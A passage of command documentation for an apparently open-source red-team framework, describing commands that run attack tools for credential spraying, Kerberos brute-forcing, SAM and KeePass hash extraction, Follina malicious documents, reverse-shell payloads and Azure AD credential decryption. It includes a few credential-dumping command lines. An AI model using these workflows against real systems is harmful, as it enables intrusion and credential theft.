  • ‘rhost’: The new remote host IP address that needs to be specified by the user.

All other fields from the original payload are preserved in the new JSON file, ensuring that no other data is lost or altered.

The newly created JSON payload will be saved in a new file with the format ‘payload_.json’, where is derived from the domain name’s subpart.

Parameters: line (str): An optional string parameter that, if provided, is used to generate the new ‘url’ and ‘domain’. If empty, the user will be prompted to enter values for ‘url’ and ‘domain’.

Returns: None

xss

Executes the XSS (Cross-Site Scripting) vulnerability testing procedure using user-defined parameters and configurations.

This method guides the user through the process of setting up and executing XSS payload injections against a specified target domain. It prompts the user for necessary input, including the XSS payload URL, the target domain, and the request timeout settings. The function ensures that all required inputs are provided and valid before proceeding with the injection process.

Parameters: line (str): A line of input that may contain additional parameters or commands (not utilized within this method).

Raises: ValueError: If the provided payload URL or target domain is empty, indicating that these are required for the injection process.

This method leverages user input for flexibility, allowing customized testing scenarios for XSS vulnerabilities.

arjun

Executes an Arjun scan on the specified URL for parameter discovery.

This function checks if Arjun is installed on the system, installs it if necessary, and then constructs a command to run Arjun against the provided URL with user-defined options.

Parameters: line (str): Input line, not currently used.

transform

Transforms the input string based on user-defined casing style.

This command asks the user for a casing style (e.g., lower, upper, camel, pascal) and transforms the input string accordingly.

Parameters: line (str): Input string to be transformed.

finger_user_enum

Executes the finger-user-enum tool for enumerating users on the target host.

This function checks if the finger-user-enum script is available locally; if not, it clones it from GitHub. It then constructs a command to run the tool with the provided wordlist of usernames and target host, and executes the command in the system.

Parameters: line (str): Input line, not currently used.

Returns: None: Outputs the command executed and any messages during execution.

duckyspark

duckyspark Compiles and uploads an .ino sketch to a Digispark device using Arduino CLI and Micronucleus.

duckyspark method checks if Arduino CLI and Micronucleus are installed on the system. If they are not available, it installs them. It then compiles a Digispark sketch and uploads the generated .hex file to the Digispark device.

The method duckyspark performs the following actions: 1. Checks for the presence of Arduino CLI and installs it if not available. 2. Configures Arduino CLI for Digispark if not already configured. 3. Generates a reverse shell payload and prepares the sketch for Digispark. 4. Compiles the prepared Digispark sketch using Arduino CLI. 5. Checks for the presence of Micronucleus and installs it if not available. 6. Uploads the compiled .hex file to the Digispark device using Micronucleus.

Args: line (str): Command line input provided by the user, which may contain additional parameters.

Returns: None: The function does not return any value but may modify the state of the system by executing commands.

username_anarchy

Generate usernames using the username-anarchy tool based on user input.

This function prompts the user to either provide names directly or select options such as auto-generation based on country datasets, input files, and specific username formats. It then constructs the command for username-anarchy and executes it.

:param line: is optional you can pass the name and lastname as an argument example: username_anarchy firstname lastname :returns: None

emp3r0r

Command emp3r0r Downloads and sets up the Emperor server for local exploitation.

This function performs the following tasks: 1. Checks if Emperor is already downloaded. 2. Downloads the Emperor tar.xz file if not already present. 3. Extracts the contents into the sessions directory. 4. Executes the Emperor server. 5. Prepares the agent download command based on the OS Host and copies it to the clipboard.

Args: line (str): Optional arguments to specify port Relay

Returns: None

Example: emp3r0r 6666

Notes: - Ensure that the required dependencies are installed.

template_helper_serializer

Handles the creation and serialization of a template helper.

This function performs the following tasks: 1. Retrieves the filename and data to be written from the input line. 2. Initializes a template file and writes the data to it. 3. Serializes the template data and outputs the result.

Args: line (str): The input line containing the filename and data in the format “filename, data”.

Returns: None

Raises: None

Example: template_helper_serializer shell.php,

gospherus

Command gospherus: Clones and uses the Gopherus tool to generate gopher payloads for various services. Use the command template_helper_serializer to generate the serialization payload. more info help template_helper_serializer

This function performs the following tasks: 0. Install Python2 (Old protocol, old t00l, old python) 1. Checks if Gopherus is already cloned in the external/.exploit directory. 2. Clones the Gopherus repository if not already present. 3. Enumerates the possible exploits and prompts the user to choose one. 4. Runs the selected exploit using Gopherus.

Args: line (str): Optional argument for specifying the chosen exploit.

Returns: None

Example: gospherus 2

wpscan

Command wpscan: Installs and runs WPScan to perform WordPress vulnerability scanning.

This function performs the following tasks: 1. Checks if WPScan is installed. 2. Installs WPScan using gem if not already installed. 3. Prompts the user for a URL to scan. 4. Allows the user to choose additional WPScan options such as –stealthy or –enumerate. 5. Executes the WPScan command with the chosen options.

Args: line (str): Optional argument to specify the URL or additional WPScan options.

Returns: None

Example: wpscan –url blog.tld

createjsonmachine_batch

Create multiple JSON payload files based on a CSV input file from HackerOne.

This function processes a CSV file located in the ‘sessions’ directory. The CSV file must contain information about different assets, including ‘identifier’, ‘eligible_for_bounty’, and ‘eligible_for_submission’. For each asset where both ‘eligible_for_bounty’ and ‘eligible_for_submission’ are set to True, a JSON payload file is created using a predefined template.

The CSV must contain the following columns: - ‘identifier’: Domain or asset name used to generate the URL and domain for the payload. - ‘eligible_for_bounty’: A boolean indicating if the asset is eligible for bounty. - ‘eligible_for_submission’: A boolean indicating if the asset is eligible for submission.

For each eligible asset: - The URL is generated based on the ‘identifier’ field. - The domain is derived from the ‘identifier’ field. - The ‘rhost’ field in the JSON payload is updated using the IP address obtained by pinging the domain.

The JSON payload is saved in the format ‘payload_.json’.

Parameters: line (str): An optional string parameter. If provided, it selects the corresponding CSV file in the ‘sessions’ directory based on the user’s input.

Returns: None

ip2hex

Convert an IPv4 address into its hexadecimal representation.

This function takes an IPv4 address in standard dotted-decimal format (e.g., ‘192.168.1.1’) and converts each of its four octets into a hexadecimal number. The resulting hexadecimal string is concatenated without separators, providing the full hexadecimal equivalent of the IP address.

The input IP address is expected to be a string in the format ‘X.X.X.X’, where X is an integer between 0 and 255.

Parameters: line (str): The input string representing the IPv4 address in dotted-decimal format.

Returns: None: The hexadecimal equivalent of the IP address is printed to the console.

john2keepas

List all .kdbx files in the ‘sessions’ directory, let the user select one, and run the command sudo keepass2john {user_file} > sessions/hash.txt. If ‘sessions/hash.txt’ already exists, it will be backed up with a timestamp to avoid overwriting.

Parameters: line (str): An optional string parameter. This can be used for any additional input, though it’s not needed in this specific command.

Returns: None

keepass

Open a .kdbx file and print the titles and contents of all entries. The password can be provided through the ‘line’ parameter, via user input, or from a ‘credentials.txt’ file in the ‘sessions’ directory.

If the file ‘credentials.txt’ exists in the ‘sessions’ directory, the first password from it will be used automatically.

Parameters: line (str): An optional string parameter to pass the password. If not provided, the user will be prompted to input the password.

Returns: None

mssqlcli

Attempts to connect to an MSSQL server using the mssqlclient.py tool with Windows authentication.

The function retrieves the necessary parameters (remote host and domain) from the instance’s parameter dictionary. If a credentials file exists in the ‘sessions_dir’, it reads the file and uses the username/password combinations found there. If the file does not exist, it prompts the user for a username and password.

The password is copied to the clipboard for convenience. A command is constructed using the mssqlclient.py tool, and it is then executed to initiate the connection to the MSSQL server.

Args: line (str): The password input from the command line or an empty string if not provided.

Returns: None

getadusers

Executes the GetADUsers.py script to retrieve Active Directory users.

The function retrieves the necessary parameters (domain controller IP and domain) from the instance’s parameter dictionary. If a credentials file exists in the ‘sessions_dir’, it reads the file and uses the username/password combinations found there. If the file does not exist, it prompts the user for a username and password.

The password is copied to the clipboard for convenience. A command is constructed using the GetADUsers.py tool, and it is then executed to enumerate Active Directory users.

Args: line (str): The password input from the command line or an empty string if not provided.

Returns: None

crack_cisco_7_password

Crack a Cisco Type 7 password hash and display the plaintext.

This command takes an encrypted Cisco Type 7 password hash as input, processes it to recover the original plaintext password, and prints the result to the console.

Args: line (str): The encrypted password hash in Cisco Type 7 format.

Returns: None: The function prints the plaintext password directly to the console.

loxs

Command loxs: Installs and runs Loxs for multi-vulnerability web application scanning.

This function performs the following tasks: 1. Checks if Loxs is already cloned in the external/.exploit directory. 2. Clones the Loxs repository if not present. 3. Installs required dependencies. 4. Prompts the user for a URL or file input, custom payload file, success criteria, and thread count. 5. Executes Loxs for scanning vulnerabilities like LFI, OR, XSS, and SQLi. 6. Displays real-time results and optionally saves vulnerable URLs.

Args: line (str): Optional argument for specifying the input URL or file, custom payload, and additional options.

Returns: None

Example: loxs –url target.com

blazy

Command blazy: Installs and runs blazy for multi-vulnerability web application scanning.

This function performs the following tasks: 1. Checks if blazy is already cloned in the external/.exploit directory. 2. Clones the blazy repository if not present. 3. Installs required dependencies. 4. Prompts the user for a URL or file input, custom payload file, success criteria, and thread count. 5. Executes blazy for Bruteforce Login. 6. Displays real-time results and optionally saves vulnerable URLs.

Args: line (str): Optional argument for specifying the input URL.

Returns: None

Example: python3 main.py -i target.com

parth

Command parth: Installs and runs Parth for discovering vulnerable URLs and parameters.

This function performs the following tasks: 1. Checks if Parth is already cloned in the external/.exploit directory. 2. Clones the Parth repository if not present. 3. Installs required dependencies using pip3. 4. Prompts the user for a URL, file input, or import option and allows for custom output such as JSON or saving parameter names. 5. Executes Parth for scanning vulnerabilities like LFI, SSRF, SQLi, XSS, and open redirects. 6. Displays real-time results and optionally saves output in a file.

Args: line (str): Optional argument for specifying the target domain, import file, or additional Parth options.

Returns: None

Example: parth -t example.com

breacher

Command breacher: Installs and runs Breacher for finding admin login pages and EAR vulnerabilities.

This function performs the following tasks: 1. Checks if Breacher is already cloned in the external/.exploit directory. 2. Clones the Breacher repository if not present. 3. Installs required dependencies. 4. Prompts the user for a target URL, file type (php, asp, html), custom paths, and thread options. 5. Executes Breacher for scanning admin login pages and potential EAR vulnerabilities. 6. Supports multi-threading and custom paths for enhanced scanning.

Args: line (str): Optional argument for specifying the target URL, file type, and additional Breacher options.

Returns: None

Example: breacher -u example.com –type php

xsstrike

Command xsstrike: Installs and runs XSStrike for finding XSS vulnerabilities.

This function performs the following tasks: 1. Checks if XSStrike is already cloned in the external/.exploit directory. 2. Clones the XSStrike repository if not present. 3. Installs required dependencies. 4. Prompts the user for a target URL, crawling level, request method, encoding, and additional XSStrike options. 5. Executes XSStrike for testing vulnerabilities, supporting multiple features like fuzzing, blind XSS injection, crawling, and more.

Args: line (str): Optional argument for specifying the target URL, crawling level, encoding, and other XSStrike options.

Returns: None

Example: xsstrike -u http://example.com/search.php?q=query –crawl -l 3

penelope

Command penelope: Installs and runs Penelope for handling reverse and bind shells.

This function performs the following tasks: 1. Checks if Penelope is already cloned in the external/.exploit directory. 2. Clones the Penelope repository if not present. 3. Prompts the user for various options to configure and run Penelope. 4. Executes Penelope with the specified options, supporting multiple features like reverse shell, bind shell, file server, etc.

Args: line (str): Optional argument for specifying the port and other Penelope options.

Returns: None

Example: penelope 5555 -i eth0

h

Open a new window within a tmux session using the LazyOwn RedTeam Framework.

This method is designed to create a new horizontal split window in an existing tmux session, where the specified command will be executed. The command used to open the new window is the ./run --no-banner script, which is intended for use within the LazyOwn RedTeam Framework environment.

The method first ensures that the specified tmux session is active by calling the ensure_tmux_session function. If the session is not already running, it will create a new one. After confirming that the session is active, it proceeds to create a new horizontal window with a specified size. The size of the new window is currently set to 50% of the available terminal space.

Args: arg (str): Additional arguments passed to the command, if any. This can be used to customize the behavior of the command executed in the new window. However, in the current implementation, this argument is not utilized and can be left as an empty string.

Example: If this method is called within a command-line interface of the LazyOwn RedTeam Framework, it will open a new horizontal tmux window and execute the ./run --no-banner command within it.

Note: - Ensure that tmux is installed and properly configured on the system. - The method assumes that the session name is defined and accessible in the scope where this method is called.

v

Open a new window within a tmux session using the LazyOwn RedTeam Framework.

This method is designed to create a new vertical split window in an existing tmux session, where the specified command will be executed. The command used to open the new window is the ./run --no-banner script, which is intended for use within the LazyOwn RedTeam Framework environment.

The method first ensures that the specified tmux session is active by calling the ensure_tmux_session function. If the session is not already running, it will create a new one. After confirming that the session is active, it proceeds to create a new vertical window with a specified size. The size of the new window is currently set to 50% of the available terminal space.

Args: arg (str): Additional arguments passed to the command, if any. This can be used to customize the behavior of the command executed in the new window. However, in the current implementation, this argument is not utilized and can be left as an empty string.

Example: If this method is called within a command-line interface of the LazyOwn RedTeam Framework, it will open a new vertical tmux window and execute the ./run --no-banner command within it.

Note: - Ensure that tmux is installed and properly configured on the system. - The method assumes that the session name is defined and accessible in the scope where this method is called.

adgetpass

Command adgetpass: Generates a PowerShell script to extract credentials from Azure AD Connect Sync.

This function generates a PowerShell script based on user inputs, including the SQL server, database, and custom keyset values. The script retrieves encryption keys, decrypts credentials, and outputs the domain, username, and password from the AD Sync configuration.

Args: line (str): Optional argument to specify the server name, database name, and other options in the following format: “server_name database_name keyset_id instance_id entropy”.

Returns: None

Example: adgetpass MONTEVERDE ADSync 1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD

openredirex

Command openredirex: Clones, installs, and runs OpenRedirex for testing open redirection vulnerabilities.

This function performs the following tasks: 1. Clones the OpenRedirex repository if not already cloned. 2. Installs the required dependencies using the setup script. 3. Prompts the user for required inputs like the URL list, payloads file, keyword, and concurrency level. 4. Executes OpenRedirex to scan the provided URLs for open redirection vulnerabilities.

Args: line (str): Optional argument for specifying the URL list, payload file, keyword, and concurrency level.

Returns: None

Example: openredirex list_of_urls.txt payloads.txt FUZZ 50

feroxbuster

Command feroxbuster: Installs and runs Feroxbuster for performing forced browsing and directory brute-forcing.

This function performs the following tasks: 1. Installs Feroxbuster using a curl command if it’s not already installed. 2. Prompts the user for required inputs like the target URL, wordlist, file extensions, and additional options. 3. Executes Feroxbuster for directory enumeration and brute-force attacks.

Args: line (str): Optional argument for specifying the target URL, wordlist, and other Feroxbuster options.

Returns: None

Example: feroxbuster -u http://example.com -w wordlist.txt -x php,html

gowitness

Command gowitness: Installs and runs Gowitness for screenshotting web services or network CIDR blocks.

This function performs the following tasks: 1. Ensures that Gowitness is installed (if not, installs it). 2. Allows the user to select the scan type (single, scan, nmap, report). 3. Based on the scan type, prompts for the appropriate input (URL or XML file). 4. Allows the user to choose additional flags based on the scan type. 5. Executes Gowitness with the chosen parameters.

Args: line (str): Optional argument for specifying the URL or scan type.

Returns: None

Example: gowitness nmap -f scan_results.xml –write-db

odat

Command odat: Runs the ODAT sidguesser module to guess Oracle SIDs on a target Oracle database.

This function performs the following tasks: 1. Ensures that ODAT is installed (checks if ‘odat.py’ exists). 2. Allows the user to specify the RHOST and port. 3. Runs ODAT’s ‘sidguesser’ module with the specified parameters.

Args: line (str): Optional argument for specifying additional ODAT options.

Returns: None

Example: odat

sireprat

Command sireprat: Automates the setup and usage of SirepRAT to perform various attacks on a Windows IoT Core device.

This function performs the following tasks: 1. Installs required dependencies and sets up SirepRAT if not already installed. 2. Prompts the user to select from predefined attacks, including retrieving system information, executing commands, saving registry keys, and copying files. 3. Executes the selected attack on the target device, using the remote host IP stored in self.params[“rhost”].

Args: line (str): Optional argument for specifying attack type directly.

Returns: None

Example: sireprat

createtargets

Generates hosts.txt, urls.txt, domains.txt, and targets.txt from multiple JSON payload files.

This function scans the current directory for all JSON files with the format ‘payload_{variable}.json’, and extracts the ‘rhost’, ‘url’, ‘domain’, and ‘subdomain’ fields from each file. It then writes these values into four separate text files: ‘hosts.txt’, ‘urls.txt’, ‘domains.txt’, and ‘targets.txt’. The ‘targets.txt’ file contains the domain and subdomain in the format ‘{subdomain}.{domain}’ and ‘{subdomain}.{url}’, with domains cleaned using the ‘get_domain’ function.

Parameters: line (str): An optional argument (unused in this function).

Returns: None

shellcode2sylk

Converts shellcode to SYLK format and saves the result to a file.

This function reads the provided shellcode, or retrieves it from a default binary source if not supplied. The shellcode is then converted to SYLK format and saved in the sessions/shellcode.sylk file.

PoC Python code to create a SYLK file with Excel4 shellcode loader.

Author: Stan Hegt (@StanHacked)

Just a proof of concept. Needs polishing before use in actual operations. Or as Adam Chester would put it: “RWX for this POC, because… yolo”

Background details: https://outflank.nl/blog/2019/10/30/abusing-the-sylk-file-format/

Args: line (str): The input shellcode string. If empty or None, the function attempts to load shellcode from a predefined source.

Returns: None: The function writes the SYLK shellcode to a file and prints it out, but does not return any value.

Raises: FileNotFoundError: If no shellcode is found when trying to load it from the default source.

magicrecon

Command magicrecon: Automates the setup and usage of MagicRecon to perform various types of reconnaissance and vulnerability scanning on specified targets.

This function performs the following tasks: 1. Clones and installs MagicRecon if not already installed. 2. Prompts the user to input the target domain, list, or wildcard if not provided. 3. Executes MagicRecon with the specified options for target reconnaissance and vulnerability analysis. 4. Supports notifications through Discord, Telegram, or Slack if configured.

Args: line (str): Command-line arguments specifying the target and recon mode. If not provided, the function prompts the user for required inputs.

Returns: None

Example: magicrecon -d example.com -a

cubespraying

Command cubespraying: Automates the installation and usage of CubeSpraying for performing credential spraying attacks.

This function performs the following tasks: 1. Clones and installs CubeSpraying if not already installed. 2. Prompts the user for the target URL, username file, password file, and optional parameters like verbosity and timeout. 3. Executes CubeSpraying for credential spraying attacks against the target URL.

Args: line (str): Optional argument for specifying the target URL, username file, password file, and additional CubeSpraying options.

Returns: None

Example: cubespraying –url http://example.com –usernames users.txt –passwords passwords.txt –verbose –timeout 5

samdump2

Run samdump2 with the SAM and SYSTEM file

:param line: This parameter is not used in the function but can be reserved for future use.

:returns: None

Manual execution: To manually run samdump2, use the following command:

samdump2 sessions/SYSTEM sessions/SAM

This function prompts the user for domain, username, password, and IP address.

stormbreaker

Command stormbreaker: Automates the installation and usage of Storm-Breaker for performing various network attacks.

This function performs the following tasks: 1. Clones and installs Storm-Breaker if not already installed. 2. Prompts the user for optional parameters and target configuration. 3. Executes Storm-Breaker to perform various attacks using the target configuration.

Args: line (str): Optional argument for specifying additional Storm-Breaker options.

Returns: None

Example: stormbreaker –verbose

upload_bypass

Command upload_bypass: Automates the installation and execution of Upload_Bypass for performing file upload bypass tests.

This function performs the following tasks: 1. Clones and installs Upload_Bypass if not already installed. 2. Prompts the user for the type of execution mode (Detection, Exploitation, or Anti-Malware). 3. Prepares and executes the chosen mode based on user input: success message, forbidden extension, upload directory, and proxy settings.

Args: line (str): Optional argument for specifying execution mode, request file, success message, forbidden extension, and other Upload_Bypass options.

Returns: None

Example: upload_bypass –detect –request_file test –success ‘File uploaded successfully’ –extension php –upload_dir /uploads –burp

hex_to_plaintext

Converts hexadecimal data from a file to plain text.

Opens a text editor for the user to paste hexadecimal data into a file. Then reads the file, processes the hexadecimal data, and writes the plain text to a new file.

Args: line (str): Name of the file containing hexadecimal data (without extension). Defaults to ‘request.txt’ if not provided.

Returns: None

rpcmap_py

Command rpcmap_py: Executes rpcmap.py commands to enumerate MSRPC interfaces.

This function allows the user to: 1. Run rpcmap.py with a specified string binding to discover MSRPC interfaces. 2. Filter the output using grep for specific DCOM-related interfaces. 3. Optionally run rpcmap.py with additional flags for brute-forcing opnums and adjusting the authentication level.

Args: line (str): Optional argument specifying the string binding or additional flags for rpcmap.py.

Returns: None

Example: rpcmap_py ‘ncacn_ip_tcp:10.10.10.213’ rpcmap_py ‘ncacn_ip_tcp:10.10.10.213’ -brute-opnums -auth-level 1 -opnum-max 5

serveralive2

Command serveralive2: Uses Impacket to connect to a remote MSRPC interface and retrieves the server bindings.

This function allows the user to: 1. Establish a connection to a remote MSRPC interface using a specified target from self.params[“rhost”]. 2. Set the authentication level to none. 3. Retrieve and print the network addresses from the server bindings using the IObjectExporter.

Args: line (str): Unused in this context. The target is derived from self.params[“rhost”].

Returns: None

Example: serveralive2

john2zip

List all .zip files in the ‘sessions’ directory, let the user select one, and run the command zip2john {selected_file} > sessions/hash.txt. Then, run John the Ripper to crack the hash using the RockYou wordlist with multiple forks.

Parameters: line (str): An optional string parameter. This can be used for any additional input, though it’s not needed in this specific command.

Returns: None

createusers_and_hashs

Command createusers_and_hashs: Extracts usernames and hashes from a dump file.

This function opens a nano editor for the user to input the contents of a file in the format:

username:UID:LM_HASH:NT_HASH:::

Once the data is entered and saved, the function generates: 1. A file named usernames_{rhost}.txt containing all usernames. 2. Individual files named hash_{username}.txt for each user, containing the user’s LM and NT hash in the format LM_HASH:NT_HASH.

Args: line (str): Unused parameter, kept for consistency.

Returns: None

pykerbrute

Command pykerbrute: Automates the installation and execution of PyKerbrute for bruteforcing Active Directory accounts using Kerberos pre-authentication.

This function performs the following tasks: 1. Clones and installs PyKerbrute if not already installed. 2. Allows the user to choose between the EnumADUser.py and ADPwdSpray.py scripts. 3. Executes the selected script with user-defined parameters, including domain, mode (TCP/UDP), and selected hash or password.

Args: line (str): Optional argument for specifying additional parameters for execution, such as domain controller, domain, and attack mode.

Returns: None

reg_py

Run reg.py with specified parameters to query the registry.

:param line: Line input for any additional parameters.

:returns: None

Manual execution: To manually run reg.py, use the following command:

reg.py -hashes : /@ query -keyName

This function prompts the user for the hash, domain, username, and registry key if they are not already provided.

name_the_hash

Identify hash type using nth after retrieving it with get_hash().

:param line: Line input for any additional parameters.

:returns: None

Manual execution: To manually identify the hash, use the following command:

nth -t “{hash}”

This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.

refill_password

Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

:param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

:returns: None

Process: Prompts the user to enter characters to replace each asterisk, creates all possible combinations, and saves them to ‘sessions/passwords_refilled.txt’. If this file exists, the previous version is renamed with a timestamp suffix.

sudo

Checks if the script is running with superuser (sudo) privileges, and if not, restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges by checking the effective user ID. If the script is not running as root, it prints a warning message and restarts the script using sudo.

:return: None

netview

Executes the Impacket netview tool to list network shares on a specified target.

This function performs the following actions: 1. Checks if the target host is valid. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and allows the user to select which file to use for executing the command. 3. If line is “hash”, it searches for a hash file and prompts the user for a username, then constructs and executes the command with the hash. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): A command argument to determine the authentication mode. If “pass”, the function searches for credential files and authenticates using the selected file. If “hash”, it uses a hash file for authentication. If neither, it prints an error message with usage instructions.

Returns: None

wmiexec

Executes the Impacket WMIExec tool to run commands on a target system using WMI.

This function performs the following actions: 1. Checks if the target IP is valid. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and allows the user to select which file to use for executing the command. 3. If line is “hash”, it searches for a hash file and prompts the user for a username, then constructs and executes the command with the hash. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): A command argument to determine the authentication mode. If “pass”, the function searches for credential files and authenticates using the selected file. If “hash”, it uses a hash file for authentication. If neither, it prints an error message with usage instructions.

Returns: None

extract_ports

Extracts open ports and IP address information from a specified file.

This function performs the following actions: 1. Reads the specified file to find open ports. 2. If not port pass as an argument, Extracts the first unique IP address found in the file. 3. Prints the extracted information to the console.

Parameters: line (str): The port to get information.

Returns: None

cron

Schedules a command to run at a specified time.

This function allows users to schedule a command to execute at a specific hour and minute. If the specified time has already passed for the current day, the command will be scheduled to run the following day.

Usage: cron HH:MM command [args]

Parameters: line (str): The input string containing the scheduled time in ‘HH:MM’ format followed by the command and arguments.

Returns: None

pezorsh

Executes the PEzor tool to pack executables or shellcode with custom configurations.

This function enables the user to construct commands for PEzor with various options. By default, parameters are prompted to ensure successful execution without failure due to missing values. It supports both executable and shellcode packing with the ability to select from a range of PEzor flags to create the desired payload.

Functionalities of the function include: 1. Prompting the user to specify if they want to pack an executable or shellcode. 2. Gathering parameters for different PEzor flags based on user choices. 3. Building the command dynamically to execute PEzor.sh with the configured options.

Example commands the function can build: - Pack an executable with 64-bit, debug, and anti-debug options. - Pack shellcode with self-injection and sleep options.

Usage: - Run ‘PEzor [donut args…]’ to pack an executable with donut options. - Run ‘PEzor ’ to pack shellcode.

:param line: String containing initial command-line arguments or options.

mimikatzpy

Executes the Impacket Mimikatz tool to interact with a target system for credential-related operations.

This function performs the following actions: 1. Validates the target IP (rhost). 2. If the line argument is “pass”, it searches for credential files matching the pattern credentials*.txt and prompts the user to select a file for executing Mimikatz. 3. If line is “hash”, it searches for a hash file, prompts for a username, and constructs the command using the hash for authentication. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the authentication mode. If “pass”, the function authenticates using credentials from a selected file. If “hash”, it uses a hash file for authentication. If neither, it displays an error message with usage instructions.

Returns: None

rdp_check_py

Executes the RDP check tool to verify credentials or hash-based authentication on a target system.

This function performs the following actions: 1. Validates the target IP (rhost). 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and prompts the user to select one to execute the RDP check. 3. If line is “hash”, it searches for a hash file, prompts the user for a username, and constructs the command using the hash for authentication. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the authentication mode. If “pass”, the function authenticates using credentials from a selected file. If “hash”, it uses a hash file for authentication. If neither, it displays an error message with usage instructions.

Returns: None

mqtt_check_py

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

This function performs the following actions: 1. Validates the target IP (rhost). 2. If the line argument is “pass”, it searches for credential files matching the pattern credentials*.txt and prompts the user to select one to execute the MQTT check. 3. If line is “ssl”, it performs the MQTT check with SSL enabled using the selected credentials. 4. If line does not match “pass” or “ssl”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the authentication mode. If “pass”, the function authenticates using credentials from a selected file. If “ssl”, it authenticates using SSL. If neither, it displays an error message with usage instructions.

Returns: None

lookupsid_py

Executes the LookupSID tool to perform SID enumeration on a target system.

This function performs the following actions: 1. Validates the target IP (rhost). 2. If the line argument is “basic”, it searches for credential files with the pattern credentials*.txt and prompts the user to select one to execute the SID lookup. 3. If line is “dc-target”, it performs the SID lookup specifying domain controller and target IPs, using the selected credentials. 4. If line does not match “basic” or “dc-target”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the lookup mode. If “basic”, the function performs a standard SID lookup. If “dc-target”, it includes -dc-ip and -target-ip arguments. If “nopass”, We run lookupsid.py , using an arbitrary username prepended to the target’s IP address If neither, it displays an error message with usage instructions.

Returns: None

scavenger

Executes the Scavenger tool for multi-threaded post-exploitation scanning on target systems with SMB credentials.

This function performs the following actions: 1. Checks if Scavenger is installed; if not, it clones the repository and installs dependencies. 2. If the line argument is “pass”, it searches for credential files matching credentials*.txt, prompts the user to select one, and executes Scavenger using the chosen credentials on a single target IP. 3. If the line argument is “targets”, it prompts for an IP list file (iplist) and uses Scavenger with credentials from a selected file on multiple target IPs with the --overwrite option. 4. If line does not match “pass” or “targets”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the authentication mode. - If “pass”, authenticates with credentials from a selected file on a single target IP. - If “targets”, authenticates on multiple targets from a provided IP list file. - If neither, displays an error message with usage instructions.

Returns: None

binarycheck

Performs various checks on a selected binary to gather information and protections.

This function executes the following checks: 1. Checks program protections using checksec. 2. Displays information about the ELF binary using readelf. 3. Retrieves the address of the system() function using objdump. 4. Searches for a known string within the binary using objdump. 5. Generates a cyclic pattern for padding using pwntools. 6. Lists gadgets in the binary using ROPgadget.

Parameters: line (str): Command argument not used in this function.

Returns: None

lookupsid

Executes the Impacket lookupsid tool to enumerate SIDs on a target system.

This function performs the following actions: 1. Validates the target IP (or hostname) specified in the line argument. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and prompts the user to select one to execute the lookupsid command. 3. If line is “hash”, it prompts the user for a username and constructs the command using the hash for authentication. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the authentication mode. If “pass”, the function authenticates using credentials from a selected file. If “hash”, it uses a hash file for authentication. If neither, it displays an error message with usage instructions.

Returns: None

certipy

Executes the Certipy tool to interact with Active Directory Certificate Services.

This function performs the following actions: 1. Validates the target IP or hostname specified in the line argument. 2. If line is “find”, it executes the certipy find command to enumerate AD CS. 3. If line is “shadow”, it prompts for an account and executes the certipy shadow command. 4. If line is “req”, it prompts for user details and executes the certipy req command to request a certificate. 5. If line is “auth”, it prompts for PFX details and executes the certipy auth command for authentication. 6. If line is “update”, it prompts for user details and executes the certipy account update command. 7. If line does not match any valid actions, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the action mode. If “find”, it enumerates AD CS. If “shadow”, it abuses shadow credentials for account takeover. If “req”, it requests a certificate. If “auth”, it authenticates using a PFX file. If “update”, it updates user information. If none of these, it displays an error message with usage instructions.

Returns: None

follina

Executes the MSDT Follina exploit tool to create malicious documents for exploitation.

This function performs the following actions: 1. Checks if follina.py is available; if not, it clones the repository and installs dependencies. 2. If the line argument is “default”, it runs the tool with default parameters to pop calc.exe. 3. If the line argument is “notepad”, it runs the tool to pop notepad.exe. 4. If the line argument is “reverse”, it prompts for a port and runs the tool to get a reverse shell. 5. If the line does not match any valid options, it displays an error message with usage instructions.

Parameters: line (str): Command argument specifying the action mode. - If “default”, executes with default parameters. - If “notepad”, executes to pop notepad.exe. - If “reverse”, prompts for a port and executes for a reverse shell. - If neither, displays an error message with usage instructions.

Returns: None

sawks

Executes the Swaks (Swiss Army Knife for SMTP) tool to send test emails for phishing simulations.

This function performs the following actions: 1. Checks if Swaks is available; if not, it clones the repository to the appropriate directory. 2. Constructs the Swaks command with the specified ‘to’ and ‘from’ emails, server, and message body. 3. Runs the command using Swaks to simulate email delivery.

Parameters: line (str): Command argument specifying additional options or the message body. - If not provided, defaults to a basic test message.

Returns: None

ad_ldap_enum

Executes ad-ldap-enum to enumerate Active Directory objects (users, groups, computers) through LDAP, collecting extended information on group memberships and additional AD details.

This function enables the enumeration of Active Directory users, groups, and computers by executing LDAP queries on a specified domain controller. The command constructed allows password or Pass-the-Hash authentication, supports SSL/TLS, and IPv4/IPv6 connections, and outputs data into CSV files detailing domain group memberships and extended user/computer information.

Functionalities include: 1. Checking for credential availability and prompting for them if not found. 2. Constructing an LDAP enumeration command with customizable authentication and server details. 3. Executing ad-ldap-enum.py to output detailed information in CSV format.

The output files are saved in the current working directory with a prepend if specified.

Example command the function can build: - python3 ad-ldap-enum.py -d scrm.local -l 10.10.11.168 -u ksimpson -p ksimpson -v

Usage: - Run dp_ad_ldap_enum to initiate AD object enumeration using ad-ldap-enum.

:param line: String containing initial command-line arguments or options.

unzip

Unzips a specified file from the sessions directory.

